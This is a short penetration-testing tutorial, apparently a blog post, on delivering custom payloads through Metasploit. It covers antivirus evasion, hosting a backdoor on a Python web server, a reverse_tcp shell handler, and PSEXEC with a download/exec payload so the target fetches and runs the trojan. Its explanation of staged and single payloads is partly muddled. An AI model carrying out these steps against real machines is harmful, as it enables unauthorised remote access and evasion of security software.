Why would we need custom payloads? Likely in situations where we launched Metasploit, but no session is created or it seems like the Antivirus software got popped.
Being a penetration tester, you have to overcome. It always seems like antivirus software is a hurdle. The best possible way to avoid antivirus software is to use custom payloads.
Create your own custom payload, and then you won’t have to worry about an antivirus signature catching your payload! It gives you the litheness to go after any target.
Note: These tools and Tools and articles are there for helping you doing so, including the Veil framework.
I'll cover Veil Framework in this custom payload series.
Let's begin...You've built your custom payload, so what’s next? What's the procedure for making it operational? What about delivery and execution at victim’s machine?
Start with Download/Exec Payload available in Metasploit. It's a tremendous option for delivering a custom payload to a target. You can even use it with memory corruption exploits i.e. Buffer Overflow, authenticated attacks like PSEXEC. In this Metasploit payload, you can use your custom payload with the Meterpreter.
You need three things for the usage of Download/Exec payload:
- Setup website from which the victim can download your custom Trojan/Backdoor.
- Setup a Metasploit handler to receive the connection from your custom backdoor.
- Create an exploit to deliver your custom payload.
Let’s take a look at the steps:
1 - Provide “Download” in the Exec payload
Quick and easy steps for websites. I use Python. Start the Python web server to change the directory that contains the files you want to make available for download. The files in that directory can then be downloaded using any web browser. You can set up this server on any computer that has Python installed.
2 - Set up the Metasploit handler to receive your connection
Start multi/handler and configure the parameters. Set your payload to one that's well-matched with the custom payload you created. If your payload contains meterpreter, you'll type:
“set payload windows/meterpreter/reverse_tcp”
If it is a command prompt then you would type
“set payload windows/shell/reverse_tcp”
My Python backdoor sends a command prompt, so I'll use:
“windows/shell/reverse_tcp”
This “single” payload doesn’t use a stagger and expect a connection from a shell. Do not confuse this with the “windows/shell_reverse_tcp” since “windows/shell_reverse_tcp” which expects a connection from a stagger, not a shell.For better understanding, check my write-ups on: https://www.cybrary.it/0p3n/metasploit-advanced/https://www.cybrary.it/0p3n/metasploit-advanced-part-ii/https://www.cybrary.it/0p3n/metasploit-advanced-part-iii/
Let's continue...Setting lhost to 127.0.0.1, set your lport like 80 - as my payload is set to send a command prompt to port 80. Start multi-handler as a background task. You can use “-j” options that will start the multi-handler as a “job” that runs in the background.
3 - Exploit and deliver the payload
With your handler in the background waiting to receive a connection, you’re ready to exploit the target. I’ll use PSEXEC.
Initially, I use “windows/smb/psexec” and set it up with the correct user and password for the target. Then, I set my payload “set PAYLOAD download/exec”The options are simple. You set the URL to point to the custom payload on you web server in step 1. You can change the name of the file that will be saved to the target if you like.
Finally, type “exploit” and you'll see it download from your website. A shell will appear in your handler.
Please Note: For those who want greater understating on PSEXEC, I'll cover this in my next write-up.
Stay Linked!!!
Ali Tabish
